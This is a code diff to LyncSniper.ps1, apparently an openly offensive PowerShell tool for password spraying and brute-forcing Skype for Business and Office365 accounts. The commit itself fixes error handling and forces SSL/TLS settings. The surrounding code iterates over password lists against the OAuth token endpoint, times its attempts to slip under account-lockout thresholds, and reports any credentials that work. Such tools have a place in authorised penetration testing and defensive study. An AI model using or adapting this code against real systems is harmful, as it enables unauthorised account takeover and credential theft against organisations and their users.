Merge pull request #6 from Raikia/master

Fixed error messages and SSL issues
mdsecresearch · Nov 19, 2017 · a73fc2c · a73fc2c
2 parents ddea28a + 84792c8
commit a73fc2c
Showing 1 changed file with 36 additions and 34 deletions.
diff --git a/LyncSniper.ps1 b/LyncSniper.ps1
@@ -49,18 +49,19 @@ function Invoke-GetAutoDiscoverURL
     $Username = ""
   )
   try{
+    $AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
+    [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
     $domain = $Username.split("@")[1]
     $lyncurl = "https://lyncdiscover.$($domain)"
-    write-host "[*] Using autodiscover URL of $($lyncurl)"
+    write-verbose "[*] Using autodiscover URL of $($lyncurl)"
     $data = Invoke-WebRequest -Insecure -Uri $lyncurl -Method GET -ContentType "application/json" -UseBasicParsing
 
     if($data)
     {
       return $lyncurl;
     }
   }catch{
-    write-output "[*] Unable to get automatically retrieve autodiscover information, please specify"
-    exit 1
+    throw "Unable to get automatically retrieved autodiscover information, please specify"
   }
 }
 
@@ -125,6 +126,8 @@ function Invoke-LyncSpray
   {
     write-host "[*] Retrieving S4B AutoDiscover Information"
     try{
+      $AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
+      [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
       $data = Invoke-WebRequest -Insecure -Uri $AutoDiscoverURL -Method GET -ContentType "application/json" -UseBasicParsing
       if(($data.content | ConvertFrom-JSON)._links.redirect)
       {
@@ -158,9 +161,7 @@ function Invoke-LyncSpray
         $baseurl = (($data.content | ConvertFrom-JSON)._links.user.href).split("/")[0..2] -join "/"
       }
     }catch [Exception] {
-      echo $_.Exception.GetType().FullName, $_.Exception.Message
-      write-host "[*] Unable to retrieve or process AutoDiscover URL"
-      exit 1
+      throw "Unable to retrieve or process AutoDiscover URL: " + $_.Exception.GetType().FullName + " - " + $_.Exception.Message
     }
   }
 
@@ -179,8 +180,8 @@ function Invoke-LyncSpray
       $result = Invoke-Authenticate -Username $Username -Password $Password -baseurl $baseurl
     }
   }
-}
-
+}
+
 function Invoke-LyncBrute
 {
 
@@ -238,7 +239,7 @@ function Invoke-LyncBrute
   )
 
   $Passwords = Get-Content $PassList
-
+
   if (-Not $AutoDiscoverURL)
   {
     Write-host "[*] No AutoDiscoverURL provided, attempting to discover"
@@ -249,6 +250,8 @@ function Invoke-LyncBrute
   {
     write-host "[*] Retrieving S4B AutoDiscover Information"
     try{
+      $AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
+      [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
       $data = Invoke-WebRequest -Insecure -Uri $AutoDiscoverURL -Method GET -ContentType "application/json" -UseBasicParsing
       if(($data.content | ConvertFrom-JSON)._links.redirect)
       {
@@ -282,46 +285,44 @@ function Invoke-LyncBrute
         $baseurl = (($data.content | ConvertFrom-JSON)._links.user.href).split("/")[0..2] -join "/"
       }
     }catch [Exception] {
-      echo $_.Exception.GetType().FullName, $_.Exception.Message
-      write-host "[*] Unable to retrieve or process AutoDiscover URL"
-      exit 1
+      throw "Unable to retrieve or process AutoDiscover URL: " + $_.Exception.GetType().FullName + " - " + $_.Exception.Message
     }
   }
 
   if($baseurl -match "online.lync.com" -And (-Not ($Office365)))
   {
     write-host -foreground "red" "[*] Domain appears to be Office365, apply -Office365 flag"
-  }
-
-  Write-Host -foreground "blue" "[*] Commencing bruteforce at $(Get-Date)"
-  Write-Host -foreground "red" "[*] BEWARE OF ACCOUNT LOCKOUTS"
-  $counter = 1
+  }
+
+  Write-Host -foreground "blue" "[*] Commencing bruteforce at $(Get-Date)"
+  Write-Host -foreground "red" "[*] BEWARE OF ACCOUNT LOCKOUTS"
+  $counter = 1
   $delay = 60
   ForEach($Password in $Passwords)
-  {
-    # Account Lockout	After 10 unsuccessful sign-in attempts (wrong password), the user will be
-    # locked out for one minute. Further incorrect sign-in attempts will lock out the user for increasing durations.
-    # https://docs.microsoft.com/en-gb/azure/active-directory/active-directory-passwords-policy
+  {
+    # Account Lockout	After 10 unsuccessful sign-in attempts (wrong password), the user will be
+    # locked out for one minute. Further incorrect sign-in attempts will lock out the user for increasing durations.
+    # https://docs.microsoft.com/en-gb/azure/active-directory/active-directory-passwords-policy
 
     if($Office365)
-    {
+    {
       if($counter -ge 10)
       {
         Write-Host -foreground "blue" "[*] Current time $(Get-Date)"
         write-host -foreground "red" "[*] Sleeping for $($delay) seconds"
         # sleep for 60 then an ever increasing amount between attempts :(
         # behaviour is o365 specific but had most success in this config
-        sleep $delay;
-        # increment delay up to 5 mins
-        if($delay -le 300)
+        sleep $delay;
+        # increment delay up to 5 mins
+        if($delay -le 300)
         {
-          $delay+=20
+          $delay+=20
         }
       }
       $result = Invoke-AuthenticateO365 -Username $Username -Password $Password
     }
     else
-    {
+    {
       if($counter -ge 4)
       {
         if(-Not $TimeDelay)
@@ -331,16 +332,16 @@ function Invoke-LyncBrute
         Write-Host -foreground "blue" "[*] Current time $(Get-Date)"
         write-host -foreground "red" "[*] Sleeping for $($TimeDelay) seconds"
         # sleep for 60 every 3 attempts - may need adjusting to avoid lockouts
-        sleep $TimeDelay;
+        sleep $TimeDelay;
         $counter=1;
       }
       $result = Invoke-Authenticate -Username $Username -Password $Password -baseurl $baseurl
-    }
-    $counter++;
+    }
+    $counter++;
 
-  }
+  }
   Write-Host -foreground "blue" "[*] Ending bruteforce at $(Get-Date)"
-}
+}
 
 function Invoke-Authenticate
 {
@@ -386,11 +387,12 @@ function Invoke-Authenticate
 
   try{
     $postParams = @{grant_type="password";username=$Username;password=$Password}
+    $AllProtocols = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
+    [System.Net.ServicePointManager]::SecurityProtocol = $AllProtocols
     $data = Invoke-WebRequest -Uri "$baseurl/WebTicket/oauthtoken" -Method POST -Body $postParams -UseBasicParsing
     $authcwt = ($data.content | ConvertFrom-JSON).access_token
   }catch [Exception]{
-    echo $_.Exception.GetType().FullName, $_.Exception.Message
-    Write-Verbose "[*] Invalid credentials: $($Username):$($Password)"
+    Write-Verbose "[*] Invalid credentials: $($Username):$($Password)   (" + $_.Exception.GetType().FullName + " - " + $_.Exception.Message + ")"
     return
   }
   write-host -foreground "green" "[*] Found credentials: $($Username):$($Password)"